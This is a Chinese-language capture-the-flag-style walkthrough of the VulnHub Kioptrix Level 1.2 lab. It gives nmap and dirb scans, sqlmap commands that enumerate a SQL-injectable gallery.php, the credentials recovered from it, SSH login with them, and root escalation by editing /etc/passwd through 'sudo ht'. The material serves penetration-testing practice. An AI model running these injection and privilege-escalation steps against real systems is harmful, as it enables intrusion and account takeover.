VulnHub渗透测试实战靶场 - KIOPTRIX: LEVEL 1.2

环境下载

戳此进行环境下载

KIOPTRIX: LEVEL 1靶机搭建

将下载好的靶机导入Vmware,网络连接设置为NAT模式即可

渗透测试

VulnHub渗透测试实战靶场 - KIOPTRIX: LEVEL 1.2

用Nmap探测一下目标靶机IP的端口信息sudo nmap -sS -A 192.168.246.135,发现开放了22和80两个端口

VulnHub渗透测试实战靶场 - KIOPTRIX: LEVEL 1.2

用dirb扫描一下web目录:dirb http://192.168.246.135

VulnHub渗透测试实战靶场 - KIOPTRIX: LEVEL 1.2

VulnHub渗透测试实战靶场 - KIOPTRIX: LEVEL 1.2

发现http://192.168.246.135/gallery/gallery.php?id=1存在SQL注入漏洞

VulnHub渗透测试实战靶场 - KIOPTRIX: LEVEL 1.2

利用sqlmap得到数据库名:sqlmap -u http://192.168.246.135/gallery/gallery.php?id=1 --dbs

VulnHub渗透测试实战靶场 - KIOPTRIX: LEVEL 1.2

利用sqlmap得到gallery数据库中的表名:sqlmap -u http://192.168.246.135/gallery/gallery.php?id=1 -D gallery --tables

VulnHub渗透测试实战靶场 - KIOPTRIX: LEVEL 1.2

利用sqlmap得到gallery数据库中的表名:sqlmap -u http://192.168.246.135/gallery/gallery.php?id=1 -D gallery -T gallarific_users --columns

VulnHub渗透测试实战靶场 - KIOPTRIX: LEVEL 1.2

得到一组用户名和密码:admin:n0t7t1k4

VulnHub渗透测试实战靶场 - KIOPTRIX: LEVEL 1.2

在另一个表dev_accounts中,得到了两组用户名和密码

VulnHub渗透测试实战靶场 - KIOPTRIX: LEVEL 1.2
dreg:Mast3r loneferret:starwars 

getshell

利用上述得到的信息,发现后两组用户名和密码可以成功连接ssh

VulnHub渗透测试实战靶场 - KIOPTRIX: LEVEL 1.2

提权

查看/etc/passwd发现loneferret用户存在利用点

VulnHub渗透测试实战靶场 - KIOPTRIX: LEVEL 1.2

查看loneferret用户家目录下信息

VulnHub渗透测试实战靶场 - KIOPTRIX: LEVEL 1.2

根据提示,使用sudo ht命令,修改/etc/passwd中loneferret用户和root用户一样

VulnHub渗透测试实战靶场 - KIOPTRIX: LEVEL 1.2

重新连接ssh,发现成功提权到root用户

VulnHub渗透测试实战靶场 - KIOPTRIX: LEVEL 1.2

版权声明:玥玥 发表于 2021-08-10 14:23:35。
转载请注明:VulnHub渗透测试实战靶场 - KIOPTRIX: LEVEL 1.2 | 女黑客导航